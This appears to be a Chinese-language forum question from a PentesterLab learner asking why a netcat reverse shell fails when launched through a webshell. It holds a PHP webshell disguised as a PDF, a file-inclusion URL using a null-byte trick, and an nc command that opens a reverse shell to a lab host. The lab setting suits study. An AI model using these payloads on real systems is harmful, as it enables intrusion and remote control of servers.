我正在练习PentesterLab, 我有一个名为1.pdf的webshell,它可以作为PHP文件包含在index.php中。它包含这样的代码:
%PDF-1.4
<?php
echo system($_GET["cmd"]);
?>
现在我想使用带有以下命令的nc创建一个反向shell,但它无法正常工作:
index.php?page=uploads/1.pdf%00&cmd=/bin/nc 192.168.117.128 8001 -e /bin/bash
如果我在192.168.117.128输入命令然后输入,则不输出任何内容。
然而,如果我直接在VM(目标服务器)中运行以下命令,它会正确连接到攻击者:
/bin/nc 192.168.117.128 8001 -e /bin/bash
命令输出在192.168.117.128正确回显
我想知道为什么netcat在VM中正常工作但在webshell中不起作用? 感谢任何人的帮助。